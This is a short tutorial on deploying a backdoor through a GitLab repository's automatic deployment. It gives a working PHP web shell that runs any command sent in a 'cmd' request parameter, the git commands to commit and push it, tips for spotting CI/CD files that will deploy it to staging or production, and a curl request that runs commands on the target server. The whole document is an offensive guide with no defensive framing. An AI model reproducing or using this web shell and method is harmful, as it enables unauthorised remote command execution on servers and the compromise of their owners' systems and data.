If you don’t have SSH access to the remote server, you can still deploy a backdoor through a GitLab repository by taking advantage of the repository’s existing deployment process. Assuming the repository is connected to a web server that automatically deploys changes from the Git repository, you can use the following steps:
- Fork or Clone the Repository
- If you don’t have write access to the repository, you can fork it and make changes in your fork.
- If you have write access, clone the repository to your local machine.
git clone <repository_url>
cd <repository_directory>- Create a PHP Backdoor
- Create a simple PHP backdoor file named
backdoor.php:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
}
?>This backdoor allows you to execute arbitrary system commands through a web request using the cmd parameter.
- Add the Backdoor to the Repository
- Add the backdoor file to the repository and commit the changes:
git add backdoor.php
git commit -m "Add backdoor"
git push origin master- Check for Automatic Deployment
- Verify if the repository is connected to a web server that automatically deploys changes from the Git repository. This may involve checking the repository for files like
.gitlab-ci.yml,.travis.yml, ordeploy.sh, which indicate that a CI/CD pipeline is in place. - If you find such files, inspect them to see if they automatically deploy changes to a remote server, such as a staging or production environment.
- Trigger the Deployment Process
- Commit and push the
backdoor.phpfile to the repository. If an automatic deployment process is in place, the web server should deploy the backdoor file to the target environment.
git add backdoor.php
git commit -m "Add backdoor"
git push origin master- Access the Backdoor
- Open a web browser or use a tool like
curlto access the backdoor on the target web server:
curl http://target-website.com/backdoor.php?cmd=id